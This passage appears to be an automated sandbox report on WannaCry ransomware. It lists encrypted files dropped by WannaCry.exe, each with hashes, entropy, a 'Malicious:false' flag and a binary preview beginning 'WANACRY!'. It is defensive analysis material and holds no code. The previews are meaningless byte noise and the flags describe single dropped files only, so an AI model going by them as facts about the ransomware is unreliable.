                                                                              Preview:WANACRY!......c..j.O..X.H.o...l..p?3Zp..?...+.>...A...x.......O..T..z-..........32F.[...#.i,C......c..-.8;......9..x...!...[..E.......F.FJ....P...$:.^Ek./d.z<5,6.V...D.]\...R..>..q......U...0#...S..ex.t.}Q.+.YA|..S*.I...V]...3.q...w\......+...}....e.x?%............Hf.^..-5..`.[*5.G..Zk...4.7"O...)V...:...t.....Q..a...c...%.:.@.....2.....,>O[.ae....c._Y...T].[.?.n?I.|MN..#......P..........^w\N..N.VA.s.`.(n[.:.j<.N.QkS....2B.q.0.F..Xqj...\s?;.14q..|.........#(..p.........q.....hJ.......xt=vi..j.k..I....."..jafL...3..|{...4}.....C$9F\..."....L...^L.D.<...TANJ...FF..RK...l.O....x..3........@.....:uVFN.......l....../...,.a.n....g..m...N*.M"[.b,.....&+A..:t......?.Q.W.v....:.A..?}\.q.....!..+H.^2....1W........KX+U...Y4..T..z..\+..~."&...#.......2.n..4.4..._.E..H.T]^..b..Ip.LE...........jqV.#.h..U....z*..:gE#..Bj.y.....F.l.....Y4..H.....J.I..O....2qO.D9z...@RK.l9.y.C.....5...Hi.....UP..x9.r'.@.5... *s.9C.`.T.w......Z...t[-{,.. ...s..>...>.U.._..._.xZ.A
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.858840718740957
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkw19Odjv0hvNamMdsfI0JXEMy7d4I3jr+cs1ObC/yO9ZxIPpbQTIw12O:bkw19NgdsfjVjgd4CjQsuq4WPpbQf1T
                                                                              MD5:4905A597A9C854CFB0603A9DDBB483F7
                                                                              SHA1:4210F36C35214824B90DDAF68638E1DAE7261AA9
                                                                              SHA-256:C0FEFAC04FE0C346958D169BC4B83C0DD3F764A9D2C641FE50A78D0230BC703E
                                                                              SHA-512:AAE58B97BEAAFA6DAB707DE4D35B0D28BC2852714DEE903A58770C001FB063B0D7C412EA9D52A6E7D2D6C75DC813E76D692931F2B930DE6D6620CDB95D00015F
                                                                              Malicious:false
                                                                              Preview:WANACRY!..../<...j....^t.......|N4:'..._2....>.v..C$T...Yu]..F.cC.$.%*.......?..&..B.g.z..&.^....F~`q....j.k.b.R.[......j?.d}....^.XI..yxr.@.%... ..!...$..4...W....S.m..T...%A..L.o.."............(.-..%.U.EX.b..vv.A...Z.O..]{]....Aw.y...~../...A.I..d.......................<w..BX.._U......E..aO.w....b..........F+~....D|...6W..{.`.....m...(P..f.).yn.Yu.EU.f2,....mZ.R....3%.^.,x.BL1p...p.....ln.a..i.......%VI.......rU...2..Q>..5A..C.a=..)..pC.S...<'!...=.!9..+a/<7.>.v....2.....".X....5.;.l..2/...e.h.?..A.b_y.p.(.....N......b.@.*C.....t>....U.&q,}....8yz.).p.X...j@...k......ka=...`....dw.J..sjo....o..s.[.L(Z>..R.*.W;.x..SNU.k.?<.n.y.;. .......LR.`........k...Fy\...b...y...T....._o...)q!q......(>.)...=..9..1..1^E..lM.b[r.`...I...M`i...On..h.;Sz...2.TX......FTnxn..6R.?.@.e.A.....>.......#.F..Z!o.yV...........n...6S.....1e..L.Y]C.^w.={.l_.....,..y.?<p..4M.R!.......GA..`B.OV.q)..S..nN[.u;. ..z~....+...O.......f\.,T..j..)5]..}.c.......q....a...d
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.858840718740957
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkw19Odjv0hvNamMdsfI0JXEMy7d4I3jr+cs1ObC/yO9ZxIPpbQTIw12O:bkw19NgdsfjVjgd4CjQsuq4WPpbQf1T
                                                                              MD5:4905A597A9C854CFB0603A9DDBB483F7
                                                                              SHA1:4210F36C35214824B90DDAF68638E1DAE7261AA9
                                                                              SHA-256:C0FEFAC04FE0C346958D169BC4B83C0DD3F764A9D2C641FE50A78D0230BC703E
                                                                              SHA-512:AAE58B97BEAAFA6DAB707DE4D35B0D28BC2852714DEE903A58770C001FB063B0D7C412EA9D52A6E7D2D6C75DC813E76D692931F2B930DE6D6620CDB95D00015F
                                                                              Malicious:false
                                                                              Preview:WANACRY!..../<...j....^t.......|N4:'..._2....>.v..C$T...Yu]..F.cC.$.%*.......?..&..B.g.z..&.^....F~`q....j.k.b.R.[......j?.d}....^.XI..yxr.@.%... ..!...$..4...W....S.m..T...%A..L.o.."............(.-..%.U.EX.b..vv.A...Z.O..]{]....Aw.y...~../...A.I..d.......................<w..BX.._U......E..aO.w....b..........F+~....D|...6W..{.`.....m...(P..f.).yn.Yu.EU.f2,....mZ.R....3%.^.,x.BL1p...p.....ln.a..i.......%VI.......rU...2..Q>..5A..C.a=..)..pC.S...<'!...=.!9..+a/<7.>.v....2.....".X....5.;.l..2/...e.h.?..A.b_y.p.(.....N......b.@.*C.....t>....U.&q,}....8yz.).p.X...j@...k......ka=...`....dw.J..sjo....o..s.[.L(Z>..R.*.W;.x..SNU.k.?<.n.y.;. .......LR.`........k...Fy\...b...y...T....._o...)q!q......(>.)...=..9..1..1^E..lM.b[r.`...I...M`i...On..h.;Sz...2.TX......FTnxn..6R.?.@.e.A.....>.......#.F..Z!o.yV...........n...6S.....1e..L.Y]C.^w.={.l_.....,..y.?<p..4M.R!.......GA..`B.OV.q)..S..nN[.u;. ..z~....+...O.......f\.,T..j..)5]..}.c.......q....a...d
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.853056000698982
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkIhiLOFsiMyhGrwjE6cPh2F3IeHYlN6yiV8pmzXIg6ZQ3SS4rPKGkP4w:bkIwLO6djrA2xeHYl8kpvQf0qF
                                                                              MD5:33AC4C0338F3119763662A458C2805A2
                                                                              SHA1:932E3BD94CD2E405E07D02FBDC842A6695891B82
                                                                              SHA-256:371FE66306BBA65271BD0DD179C7170B35630C3956BC187F06584009B4410FC4
                                                                              SHA-512:361D254AF02338551FC49C9EB68FA2B6EBCC3AB290E348509A29F7F5451DA6FEB8FE0C85BB6B03EF5C1F23FDADA574285E78766014238941476E3F4171AF9F4E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.............^..!.@.aU...]...M'V.(..?.1:.*........<...AHD5y.93.-.....2......VT1..f75.."az.W...l!..F....0ua..._...s`..2.....(..&M.z.G..:}..'*....o.:.a.=..<.l...0.x~.....&G..P.]....9..UP.f1l..WD.(..B*c.Z.MU..Q.B.V.s...V.F...0... ....[~.p~.W..pl.............. .^Je....../...n...".A...n.........>.V.G...H.j&u...W.o.....}E....1.]x...&..G....qY...#U>:m.,...V.K.....&C..tm.;.e..O.n.E..\.......C...i..H;......6.. ."..C..1...u$......&..k4<..q.oA..4...2..F...E....z.5.....%..y*}!:.k..i.`W.@-...m...;F2...@.f..}..LtW.J....R......@...p..e..]...~$l...v..S......P..M>.."......!q..9.../v..}@_.~.c............g..}..Sv.i....J.P.%..w.<....;.U...2.2.zf...3C...&..}.Y.....V.k.".......%*S...MF..$....3.m~D..(..G..uO([\..v.......%.].Z..vG^.FW..B..o.M]{...>.:7g....S.2..3>..v....U...L .7Q..|..&..5W;.........8..\E..)Fw..rbJf}Q+N..e..{VCE.(.1'.Ojz.e...D..(6.Nq}.C.....}D'....yY...$.....J.un/.v.l../AcB..!@`PA.,.:.g.\.z@/...l..ZY0.C. ..R....f%].....1D$O.fp}...Y.u
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.853056000698982
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkIhiLOFsiMyhGrwjE6cPh2F3IeHYlN6yiV8pmzXIg6ZQ3SS4rPKGkP4w:bkIwLO6djrA2xeHYl8kpvQf0qF
                                                                              MD5:33AC4C0338F3119763662A458C2805A2
                                                                              SHA1:932E3BD94CD2E405E07D02FBDC842A6695891B82
                                                                              SHA-256:371FE66306BBA65271BD0DD179C7170B35630C3956BC187F06584009B4410FC4
                                                                              SHA-512:361D254AF02338551FC49C9EB68FA2B6EBCC3AB290E348509A29F7F5451DA6FEB8FE0C85BB6B03EF5C1F23FDADA574285E78766014238941476E3F4171AF9F4E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.............^..!.@.aU...]...M'V.(..?.1:.*........<...AHD5y.93.-.....2......VT1..f75.."az.W...l!..F....0ua..._...s`..2.....(..&M.z.G..:}..'*....o.:.a.=..<.l...0.x~.....&G..P.]....9..UP.f1l..WD.(..B*c.Z.MU..Q.B.V.s...V.F...0... ....[~.p~.W..pl.............. .^Je....../...n...".A...n.........>.V.G...H.j&u...W.o.....}E....1.]x...&..G....qY...#U>:m.,...V.K.....&C..tm.;.e..O.n.E..\.......C...i..H;......6.. ."..C..1...u$......&..k4<..q.oA..4...2..F...E....z.5.....%..y*}!:.k..i.`W.@-...m...;F2...@.f..}..LtW.J....R......@...p..e..]...~$l...v..S......P..M>.."......!q..9.../v..}@_.~.c............g..}..Sv.i....J.P.%..w.<....;.U...2.2.zf...3C...&..}.Y.....V.k.".......%*S...MF..$....3.m~D..(..G..uO([\..v.......%.].Z..vG^.FW..B..o.M]{...>.:7g....S.2..3>..v....U...L .7Q..|..&..5W;.........8..\E..)Fw..rbJf}Q+N..e..{VCE.(.1'.Ojz.e...D..(6.Nq}.C.....}D'....yY...$.....J.un/.v.l../AcB..!@`PA.,.:.g.\.z@/...l..ZY0.C. ..R....f%].....1D$O.fp}...Y.u
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.842272249660294
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkim2xEGookcs97m+Iqb5ohgrYXz+GFncGd5GF3SPxGJxvbFxXot:bkiYGuq+Iqb5XrYXiGFncKkSJcb7Yt
                                                                              MD5:97DFE4EE533386D9C55D253828EC2076
                                                                              SHA1:24C935CA4FC30362F33FDADA05DA02B0EA673DB3
                                                                              SHA-256:BD5B2420060351E94E70498598659718343EEEA296D73B40B17C3EAC681FCA78
                                                                              SHA-512:A97D4D5E274B4283E64E0375E3D1A8A380F1CF9F8E55428760BBED4E269207A41BCE83C6B4046CFB29B7C58BFE2F4C36B2D2AD0D37F69B1120857FE820DD6EDE
                                                                              Malicious:false
                                                                              Preview:WANACRY!......u.d...~.z....~W...~7e....|..........A..hI..Vq..4>..n.....gKk...Vp.#....,fcL!MT/R..3N.y....Ug..g^.Q..9{.."q8+h..).0..k..P.].J*.......u.0.. .'&./ Z%:..?..../si..$]+.1.N7..p...v.:.+.i...p...R..U...g.=...g@"..5./I.....Oa...r....?...m,...(.["\...M................g9...E..t..t....q.#m.., .0....._+........V..t..:..}.F...-..p.^...a....H..6...V....pwv.I?4..9*#B.........%.X.-.^Y....9....T].H....@...Y.Q......ah>.r-...).,..K.3.T...]..6n9.LJ.Y0......~...K..HkU;..j/0..@..)=J..p...@.....$.....nEe..e.3.+.".!L....ntx..y2.{q........E.......2..Yh..=,.+k\.l.T/o#.h2.UZ.D$..A.b.|...NE-l.D .A.E2L.O..h/.3+.....Qc....>..k......)w...}...ii...2.U...w_....8.C.|....v...".....]...._.j..` .. ...}..a.S.Q.&...h...O....$I....TS.R..\...J.e..............$5...x....q/6}g.6%.`KD(...p...B].#h"..w.A....a...W...j...*..Y6....T...:|X..\\W..].8.f.EZ_..'A.T...-.....F;F.}..{Q..p......[...F ..."..b....... s.q}.l.e...i.K.t.u.W...1..x.".{[.o.....s.H)Oee.<....Qi.)j...v'.a..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.842272249660294
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkim2xEGookcs97m+Iqb5ohgrYXz+GFncGd5GF3SPxGJxvbFxXot:bkiYGuq+Iqb5XrYXiGFncKkSJcb7Yt
                                                                              MD5:97DFE4EE533386D9C55D253828EC2076
                                                                              SHA1:24C935CA4FC30362F33FDADA05DA02B0EA673DB3
                                                                              SHA-256:BD5B2420060351E94E70498598659718343EEEA296D73B40B17C3EAC681FCA78
                                                                              SHA-512:A97D4D5E274B4283E64E0375E3D1A8A380F1CF9F8E55428760BBED4E269207A41BCE83C6B4046CFB29B7C58BFE2F4C36B2D2AD0D37F69B1120857FE820DD6EDE
                                                                              Malicious:false
                                                                              Preview:WANACRY!......u.d...~.z....~W...~7e....|..........A..hI..Vq..4>..n.....gKk...Vp.#....,fcL!MT/R..3N.y....Ug..g^.Q..9{.."q8+h..).0..k..P.].J*.......u.0.. .'&./ Z%:..?..../si..$]+.1.N7..p...v.:.+.i...p...R..U...g.=...g@"..5./I.....Oa...r....?...m,...(.["\...M................g9...E..t..t....q.#m.., .0....._+........V..t..:..}.F...-..p.^...a....H..6...V....pwv.I?4..9*#B.........%.X.-.^Y....9....T].H....@...Y.Q......ah>.r-...).,..K.3.T...]..6n9.LJ.Y0......~...K..HkU;..j/0..@..)=J..p...@.....$.....nEe..e.3.+.".!L....ntx..y2.{q........E.......2..Yh..=,.+k\.l.T/o#.h2.UZ.D$..A.b.|...NE-l.D .A.E2L.O..h/.3+.....Qc....>..k......)w...}...ii...2.U...w_....8.C.|....v...".....]...._.j..` .. ...}..a.S.Q.&...h...O....$I....TS.R..\...J.e..............$5...x....q/6}g.6%.`KD(...p...B].#h"..w.A....a...W...j...*..Y6....T...:|X..\\W..].8.f.EZ_..'A.T...-.....F;F.}..{Q..p......[...F ..."..b....... s.q}.l.e...i.K.t.u.W...1..x.".{[.o.....s.H)Oee.<....Qi.)j...v'.a..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.857229738557775
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkztlO53Qn1V4s9of/cYB8juCLIf28OWl9T1j8tcj2db/Hy3zS6A929e99PLffkx:bkzS944GoHt8jhIfhOsBhj2db4zJAseS
                                                                              MD5:6BDF2A14B02147456686372EA67CB59C
                                                                              SHA1:3ED28197FAF2331776C4E5D01301AF1B04CC62C5
                                                                              SHA-256:5A804A3DA8A700CEFB26606CD7B0033B9E893779CDCE1F0D4129D63B48D46A0A
                                                                              SHA-512:4F43FDCC50605B904441498B347A278EB581ADCA4146A5C20A5E49FD2FBC7A49F291645B07A49E8CFBBD986C4FC5DBA59555F6A9D3069518EE9E16AF5E18E72B
                                                                              Malicious:false
                                                                              Preview:WANACRY!........R....J..{..=.AM..K...n3.=z.._-.....S.N.q}.....C....N..{O.l..0...g-*.?)T.&.[......)....[l..\H..4.....dd..a$.:.u8f.....|B.].h..QqL..d.a..-.hs......;..\.n...._..tr"...s)a...X.+...c+.....N..(.....|...r0H............s.5...g.;I.5.......=..............G.J....+;....;R.....L.A...f....u.>.5*....f,.j...).E...o....r<.n*.C.xld..|t..c..A..(7..n....~........sxW.9*......DI.....}..m..Q..W..H..V>....I..8.C.6........_z.......*>.(..D...........fH...I...QB..Y.Z....w Ne.#Y<..\;..4.|j.{<......a...,H...)........$O.>.......r.".M!..A....a..pB...0:..........u.k...2.[...;b.....l....!..f.R>.....>...ln.....c.. 3q....#....6W.....i}....g_W...U.....h..Q..n..F>..I.@.%..[.a9.1.....I9L[....827.r..:..<k.]..x...p:...>T..%.6.....u.!.s.@..5.F..s|.Z....K.).J.>.)......|.2...o.....;.....t...1S.S.QI_}9md.(.B.O.ih~1z.g......&...t......Xj....-..V.2.N...v.......%...y.*..%19...m..../..>..*#.......M.o.'....pm...'....b.u.N....IR&..VD..i7..{.Uj.Ev.^.P.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.857229738557775
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkztlO53Qn1V4s9of/cYB8juCLIf28OWl9T1j8tcj2db/Hy3zS6A929e99PLffkx:bkzS944GoHt8jhIfhOsBhj2db4zJAseS
                                                                              MD5:6BDF2A14B02147456686372EA67CB59C
                                                                              SHA1:3ED28197FAF2331776C4E5D01301AF1B04CC62C5
                                                                              SHA-256:5A804A3DA8A700CEFB26606CD7B0033B9E893779CDCE1F0D4129D63B48D46A0A
                                                                              SHA-512:4F43FDCC50605B904441498B347A278EB581ADCA4146A5C20A5E49FD2FBC7A49F291645B07A49E8CFBBD986C4FC5DBA59555F6A9D3069518EE9E16AF5E18E72B
                                                                              Malicious:false
                                                                              Preview:WANACRY!........R....J..{..=.AM..K...n3.=z.._-.....S.N.q}.....C....N..{O.l..0...g-*.?)T.&.[......)....[l..\H..4.....dd..a$.:.u8f.....|B.].h..QqL..d.a..-.hs......;..\.n...._..tr"...s)a...X.+...c+.....N..(.....|...r0H............s.5...g.;I.5.......=..............G.J....+;....;R.....L.A...f....u.>.5*....f,.j...).E...o....r<.n*.C.xld..|t..c..A..(7..n....~........sxW.9*......DI.....}..m..Q..W..H..V>....I..8.C.6........_z.......*>.(..D...........fH...I...QB..Y.Z....w Ne.#Y<..\;..4.|j.{<......a...,H...)........$O.>.......r.".M!..A....a..pB...0:..........u.k...2.[...;b.....l....!..f.R>.....>...ln.....c.. 3q....#....6W.....i}....g_W...U.....h..Q..n..F>..I.@.%..[.a9.1.....I9L[....827.r..:..<k.]..x...p:...>T..%.6.....u.!.s.@..5.F..s|.Z....K.).J.>.)......|.2...o.....;.....t...1S.S.QI_}9md.(.B.O.ih~1z.g......&...t......Xj....-..V.2.N...v.......%...y.*..%19...m..../..>..*#.......M.o.'....pm...'....b.u.N....IR&..VD..i7..{.Uj.Ev.^.P.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.852296946601409
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkLNKAxPzrKXsytaGlqDxVvAX2MrEUQ5wTMNt8piBKbv3EANl6nPOp59HEF8F:bkLNFxLWXptaGQDx9AX21wMNBBA94PGR
                                                                              MD5:DEC1530447A3D6ACCBE65D41DBA6054A
                                                                              SHA1:D0680B25EE7A4470AEF8D492295A0E809CDEFFCA
                                                                              SHA-256:878D8682F4D950820B5634337B98EE6488975793C1D1F7CE47FEDD8E3B09D8D2
                                                                              SHA-512:0A7A52363CFBB9D55703C962E9DDD879C3FE84604E2B6A72C6AE8863219221D12237214661E680F18B2954E453C5DF8ECBCDB2203525B40D41DC5E506A4247F7
                                                                              Malicious:false
                                                                              Preview:WANACRY!....I.QBL.9p.U!.E.s...*...Ns.......Pn.._..-k.......\.i..%5.$..x..(p..5[z..CG9........kk.i..tGI$#.....7....n...o..im.<....Nj...s#.T..?.c.|j?[S*.3.;..=....J^.".w6?.."....y.....N..]....3.`....I.c..O.c...B.....4..q.F..@..........E!....*o.i.....+`M*................9vP..[Er...?..^h."..$.....o.A.>..uV..q..r.U.w.....z./!#....]..S*..</..K..%...o.i.....F .`X.,\..1>9....aI.;..Z.V...P.N...`.iTv%...C./}...|...ejz..|N..4.&E...Ed@ ...!<...?...././..9.;.B.....f....oL...$<.T.4..\l...8x..).\..^e^Eb..!...X.Y.cf.P.......X.M^..a/.Gg.....t...^Z ::e}.,D..1...5.1k..">*...XtX.].x.@.x......M..!.kXJn.U."Gh.\\......t4-.~s..T..x}..../...UER%... .Gx.fy.~..k 3.}...9v...].#.Uay. .~;._....-..#F5h......r..|I..>u...v..6...v....=N.xw...2;......f..:..g.....0.../...6k..X=....ii(....4e|QT.....H.....2.ivL.N+b..ACI<....5G....d........4.J......].S.....V.Xz.3..x...gu.f$f.!....u...2...l8|M.H..HR..=$P..d.Y...._4UMX. ..V.c.>..fx?0.S..'.d.....j........e..,.......m.q.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.852296946601409
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkLNKAxPzrKXsytaGlqDxVvAX2MrEUQ5wTMNt8piBKbv3EANl6nPOp59HEF8F:bkLNFxLWXptaGQDx9AX21wMNBBA94PGR
                                                                              MD5:DEC1530447A3D6ACCBE65D41DBA6054A
                                                                              SHA1:D0680B25EE7A4470AEF8D492295A0E809CDEFFCA
                                                                              SHA-256:878D8682F4D950820B5634337B98EE6488975793C1D1F7CE47FEDD8E3B09D8D2
                                                                              SHA-512:0A7A52363CFBB9D55703C962E9DDD879C3FE84604E2B6A72C6AE8863219221D12237214661E680F18B2954E453C5DF8ECBCDB2203525B40D41DC5E506A4247F7
                                                                              Malicious:false
                                                                              Preview:WANACRY!....I.QBL.9p.U!.E.s...*...Ns.......Pn.._..-k.......\.i..%5.$..x..(p..5[z..CG9........kk.i..tGI$#.....7....n...o..im.<....Nj...s#.T..?.c.|j?[S*.3.;..=....J^.".w6?.."....y.....N..]....3.`....I.c..O.c...B.....4..q.F..@..........E!....*o.i.....+`M*................9vP..[Er...?..^h."..$.....o.A.>..uV..q..r.U.w.....z./!#....]..S*..</..K..%...o.i.....F .`X.,\..1>9....aI.;..Z.V...P.N...`.iTv%...C./}...|...ejz..|N..4.&E...Ed@ ...!<...?...././..9.;.B.....f....oL...$<.T.4..\l...8x..).\..^e^Eb..!...X.Y.cf.P.......X.M^..a/.Gg.....t...^Z ::e}.,D..1...5.1k..">*...XtX.].x.@.x......M..!.kXJn.U."Gh.\\......t4-.~s..T..x}..../...UER%... .Gx.fy.~..k 3.}...9v...].#.Uay. .~;._....-..#F5h......r..|I..>u...v..6...v....=N.xw...2;......f..:..g.....0.../...6k..X=....ii(....4e|QT.....H.....2.ivL.N+b..ACI<....5G....d........4.J......].S.....V.Xz.3..x...gu.f$f.!....u...2...l8|M.H..HR..=$P..d.Y...._4UMX. ..V.c.>..fx?0.S..'.d.....j........e..,.......m.q.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.849571938507265
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkfXHQh4hLhDR6NZ9e4DezMwHZLS1matt9niVycqrt5M77UUcjRI:bkfXH5hh4tDsM2LSHt4rqrE7lcje
                                                                              MD5:0A94549E0AFA258AA762879F8B802BC3
                                                                              SHA1:048FD0EB6F88BC6B57BD6E04B1479A6FA9B78516
                                                                              SHA-256:E32F8903596F686DEC3CEEB1F23717815850713FE33ED0F7C06A2235FCD9AAC2
                                                                              SHA-512:8347FD1716CE9FE1DDF206C1A8766AB675BD7FE7805BEDAF165802E9AE08D8CC08D769C9A0A5343CFF075F5B17A511C4D41BF6BBAE1C9C497638C701B7A45292
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....D..C.G$...N.......qK.?./7s..."v.4........l.&....wD....3..!5.............Q./H.I.......h..;~l)/...yj{).9.v_2.....L.@.l..fS..fJ.......fKJ...~_O..V..)9.).D@..KR.R.cp....=1.2EE.....Q..E..l....+...s...~....4...7f.........&k..E?.~67.d.jr...W.&*%.....x.............|.p.p.x:Lb.2..=.4~)v..Is.b..x.k..~..G...-....[.2?..k6..C.....D/.....Q@...ZP..YN....$3a.~...j.B/.'&S!...o.vK...V..g_.W..%.\..3.g|..j?X.. ..!...S..-x.........apM.3:{..."3....7I=.KK.....8.|..ai.s...O..T.}.$..A...j:z.......3.$.O....JP.....m.}.]..2Z.P\i........6.Yb........yw..._-W...9K.mU.....BJ.v....&<..[..^z>..M..K..V....H.b....I.......K9q.....a...d]M...a.Z.I.M.9....*]..*...V-Z..>......ILr...R.r.Y.._.:.=4.U...>S2...j.R\A.j]w.(..x7....=.....U.. .L..M..&.+Y...@g..9...!....){.F._.V..C.Do?...gm[..;8......Y...\....'q..J}i.7.u.|;D...8.VS.p....=..|}.`..u{ ..6.u.mb.Dw.5...}j.)b..g..<Q...gF...........QF...-..3...D4.R..T]u.Z......I(C..$...."..`V.u.c<..0.Le.n..p+~......?.f&.....t...p.....JR..~
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.849571938507265
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkfXHQh4hLhDR6NZ9e4DezMwHZLS1matt9niVycqrt5M77UUcjRI:bkfXH5hh4tDsM2LSHt4rqrE7lcje
                                                                              MD5:0A94549E0AFA258AA762879F8B802BC3
                                                                              SHA1:048FD0EB6F88BC6B57BD6E04B1479A6FA9B78516
                                                                              SHA-256:E32F8903596F686DEC3CEEB1F23717815850713FE33ED0F7C06A2235FCD9AAC2
                                                                              SHA-512:8347FD1716CE9FE1DDF206C1A8766AB675BD7FE7805BEDAF165802E9AE08D8CC08D769C9A0A5343CFF075F5B17A511C4D41BF6BBAE1C9C497638C701B7A45292
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....D..C.G$...N.......qK.?./7s..."v.4........l.&....wD....3..!5.............Q./H.I.......h..;~l)/...yj{).9.v_2.....L.@.l..fS..fJ.......fKJ...~_O..V..)9.).D@..KR.R.cp....=1.2EE.....Q..E..l....+...s...~....4...7f.........&k..E?.~67.d.jr...W.&*%.....x.............|.p.p.x:Lb.2..=.4~)v..Is.b..x.k..~..G...-....[.2?..k6..C.....D/.....Q@...ZP..YN....$3a.~...j.B/.'&S!...o.vK...V..g_.W..%.\..3.g|..j?X.. ..!...S..-x.........apM.3:{..."3....7I=.KK.....8.|..ai.s...O..T.}.$..A...j:z.......3.$.O....JP.....m.}.]..2Z.P\i........6.Yb........yw..._-W...9K.mU.....BJ.v....&<..[..^z>..M..K..V....H.b....I.......K9q.....a...d]M...a.Z.I.M.9....*]..*...V-Z..>......ILr...R.r.Y.._.:.=4.U...>S2...j.R\A.j]w.(..x7....=.....U.. .L..M..&.+Y...@g..9...!....){.F._.V..C.Do?...gm[..;8......Y...\....'q..J}i.7.u.|;D...8.VS.p....=..|}.`..u{ ..6.u.mb.Dw.5...}j.)b..g..<Q...gF...........QF...-..3...D4.R..T]u.Z......I(C..$...."..`V.u.c<..0.Le.n..p+~......?.f&.....t...p.....JR..~
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.845975569983978
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkWp7kBQhog0LpDu+KAwAqCNZz282IQnzyIKd9ej0Phb5BqeoV3hlIRH:bku7BeFwDAhNZz282ImVqbedhlIh
                                                                              MD5:EDF1B46EC72B9E00BA573E0F22D2E624
                                                                              SHA1:0D806709F1B22CF51B6B1FEA7B907306A04354CB
                                                                              SHA-256:F88750066FB22B08C0B8889CE535CBBFFE2E0840B6FAA111C4327590AB2C6733
                                                                              SHA-512:1E5DB3316197BFD4576CB70B1ED9EAA30C83FEC623F3AE069AB591E2C04698C82F26206A234A89719B2D76653F7B2AC4138DF255E6720A57DFBF5E08413159E8
                                                                              Malicious:false
                                                                              Preview:WANACRY!....7;..!yxT..S.m.i..........{.'.mI..,..F.......s...G;.Kx..??.rY.!.0'cA.3...u5.P..+~..'.m>Ip...P{...>5....I....tk.....\`9+_.7N#G.7.c..@.z|......Z.{...FF........|.....f$ ...x5.$..+...."Z.h...U.p....Y.8>..M+.V!..1.."}....|..HrY.L..B}./.=...O'd2*l....}..............*.....~E(..@#.U)8.Q.....1.yP..rA.S...R..V..C.A.x.]!...!....<.(..!.N....].\?......3.V..[...Yoxy.......J..o.>O.[.@O..ZW.5.Q0@......x.I.).......[..!....y.3....f.9. ..pe. ....b.....z.G9...F_...N...Z.V....e....aK.:.&..e......s....c....$.g.~...i...^...Z....>....P....sU..D<i..#Z.<...:1.`Z.,...~...|..Pn..`..J..ao......f.n......t...#.....f}.....)8.......:......3.P0.d8...]K.q.D....k....z|B.A.$IG..`......?x..d.M.R...A..z.!7/..............2......g.Am...-R...)D..]...H...+v.c.........H.aPDp..|.v.....]... .B..2.'.k1)2h..&...p.bvy.h.;"..$V%.W....g...R.)=-e.`.^B0.<...$h.....r....7..]..............TYz.x.2s...j....*q.t.G..>..GS.u.>.^..K.....P:...&)..~..(.B.zzAC.qn.>......g}.\A..C.-.N![....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.845975569983978
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkWp7kBQhog0LpDu+KAwAqCNZz282IQnzyIKd9ej0Phb5BqeoV3hlIRH:bku7BeFwDAhNZz282ImVqbedhlIh
                                                                              MD5:EDF1B46EC72B9E00BA573E0F22D2E624
                                                                              SHA1:0D806709F1B22CF51B6B1FEA7B907306A04354CB
                                                                              SHA-256:F88750066FB22B08C0B8889CE535CBBFFE2E0840B6FAA111C4327590AB2C6733
                                                                              SHA-512:1E5DB3316197BFD4576CB70B1ED9EAA30C83FEC623F3AE069AB591E2C04698C82F26206A234A89719B2D76653F7B2AC4138DF255E6720A57DFBF5E08413159E8
                                                                              Malicious:false
